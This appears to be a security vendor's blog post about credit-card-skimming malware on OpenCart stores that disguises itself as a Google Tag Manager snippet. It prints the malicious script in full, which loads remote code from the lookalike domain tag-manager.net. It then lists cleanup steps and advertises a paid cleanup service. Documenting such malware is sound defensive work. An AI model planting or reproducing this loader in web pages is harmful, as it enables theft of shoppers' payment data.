In an interesting find, our team has discovered an unusual credit card stealing malware in OpenCart websites that mimics Google Tag Manager scripts.
The malware dubbed as ‘GTM malware’ hides as a fake Google tag manager file by the name – tag-manager.net, which can be found inside the Google Analytics field of an OpenCart admin panel.
The malicious script is as follows:
<!-- Google Tag Manager -->
<script>!function(e,t,a,n){e[n]=e[n]||[],e[n].push({"gtm.start":
(new Date).getTime(),event:"gtm.js"});var r=t.getElementsByTagName(a)[0],
g=t.createElement(a),o="dataLayer"!=n?"&utm_referer="+n:"",s="tags";g.async=!0,
g.src=("//googletagmanager.net/g"+s+"/"+a+"2?utm_content=&utm_source="+o)
.replace("googletag","tag-"),r.parentNode.insertBefore(g,r)
}(window,document,"script",location.hostname);
</script>Also read: Admin Password Compromised and Credit Card Details Sent to Hacker Email – OpenCart & Prestashop
What you can do?
If your customers have been complaining about credit card theft of late, it might be possible that your OpenCart store has been hacked with Credit Card (CC) malware.
This is what you should do in such a case:
- Scan your website with a malware scanner to confirm the hack
- Take a backup of your store
- Check for foreign files and scripts. Especially look for the fake GTM file ‘tag-manager.net’.
For detailed steps, check our guide on How to fix OpenCart credit card hack.
Immediate malware cleanup by Astra Security
Dealing with a live business store can be complicated and you don’t want your wrong move to break your website. This is why a professional malware cleanup is the best resort in any dire security situation.
At Astra, our qualified security professionals fix hundreds of hacked websites daily. With our Immediate malware cleanup, your OpenCart store will be fixed in under 6-8 hours. You also get a year-long subscription to Astra’s Security Suite with a 24*7 active Website Firewall, an on-demand Malware Scanner, and several other security features and tools. Check out other Astra features here.